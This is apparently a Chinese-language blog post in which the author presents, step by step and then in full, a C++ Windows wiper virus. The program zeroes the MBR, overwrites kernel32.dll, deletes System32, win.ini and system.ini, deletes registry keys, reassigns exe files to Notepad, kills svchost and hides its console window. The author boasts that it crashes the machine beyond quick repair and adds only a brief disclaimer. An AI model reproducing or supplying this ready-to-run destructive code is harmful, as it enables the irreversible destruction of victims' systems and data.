写了这么多python病毒，今天我来给大家分享一个C++病毒。

 

创作背景：我有个同学对电脑十分精通，而且对MBR十分感兴趣，他跟我分享了他怎么把MBR搞报废的历程。听完之后，我开始研究MBR。用python研究了2个月，结果做的是无用功。知道我这个月学了C++！我学会了如何破坏MBR！于是我开始做这款超强病毒。做了2天（一直在调试，把病毒弄到最佳状态）。

IDE：visual studio 2022

功能：感染kernel32.dll、删除system32、win.ini、system.ini、删除所有注册表、修改exe打开方式、修改MBR

修复方法：用PE修复引导，恢复丢失的文件，修复文件打开方式（或重装系统）

第一步，把头文件给导入进来。

#include <stdio.h>
#include <iostream>
#include <Windows.h>

然后做点设置

#define _CRT_SECURE_NO_WARNINGS 1 //跳过安全检查
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )//隐藏dos窗口

然后做修改MBR函数

void kill_mbr()//修改MBR
{
	FILE* disk = fopen("\\\\.\\PHYSICALDRIVE0", "rb+");
	char mbr[512] = { 0 };
	fwrite(mbr, sizeof(mbr), 1, disk);
	fclose(disk);
}

做感染kernel32.dll函数

void infect()//感染kernel32.dll
{
	FILE* infect_file = fopen("C:\\Windows\\SysWOW64\\kernel32.dll","rb+");
	char write[666] = { 0 };
	fwrite(write, sizeof(write), 1, infect_file);
	fclose(infect_file);
}

然后是其他功能的代码

system("del /f /s /q C:\\Windows\\System32\\*.*");//删除system32
system("ftype exefile='C:\\Windows\\notepad.exe'%*");  //把可执行文件的打开方式都改成notepad
system("@echo off Start reg delete HKCR/.exe Start reg delete HKCR/.dll Start reg delete HKCR/*");//删除所有注册表
system("attrib -s -r -h C:\\Windows\\system.ini");
system("del /f /s /q C:\\Windows\\system.ini");
system("attrib -s -r -h C:\\Windows\\win.ini");
system("del /f /s /q C:\\Windows\\win.ini"); //删除系统重要文件

对了，还要终止系统进程

system("taskkill /f /im svchost.exe");

然后这样的话运行之后直接蓝屏死机，连修复时间都基本没有~

总代码

#define _CRT_SECURE_NO_WARNINGS 1 //跳过安全检查
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )//隐藏dos窗口
#include <stdio.h>
#include <iostream>
#include <Windows.h>
using namespace std;
void kill_mbr()//修改MBR
{
	FILE* disk = fopen("\\\\.\\PHYSICALDRIVE0", "rb+");
	char mbr[512] = { 0 };
	fwrite(mbr, sizeof(mbr), 1, disk);
	fclose(disk);
}
void infect()//感染kernel32.dll
{
	FILE* infect_file = fopen("C:\\Windows\\SysWOW64\\kernel32.dll","rb+");
	char write[666] = { 0 };
	fwrite(write, sizeof(write), 1, infect_file);
	fclose(infect_file);
}
int main()
{
	infect();
	kill_mbr();
	system("del /f /s /q C:\\Windows\\System32\\*.*");//删除system32
	system("ftype exefile='C:\\Windows\\notepad.exe'%*");  //把可执行文件的打开方式都改成notepad
	system("@echo off Start reg delete HKCR/.exe Start reg delete HKCR/.dll Start reg delete HKCR/*");//删除所有注册表
	system("attrib -s -r -h C:\\Windows\\system.ini");
	system("del /f /s /q C:\\Windows\\system.ini");
	system("attrib -s -r -h C:\\Windows\\win.ini");
	system("del /f /s /q C:\\Windows\\win.ini"); //删除系统重要文件
	system("taskkill /f /im svchost.exe");
	return 0;
}

火绒报毒这是木马（好几次了）

我都生成不了程序了都...... 

以上就是病毒代码，如要使用，请用虚拟机。下载研究后请严禁用于非法用途，使用本文件产生的一切后果由下载者自行承担，谢谢！

请多多提建议，我会继续改进的！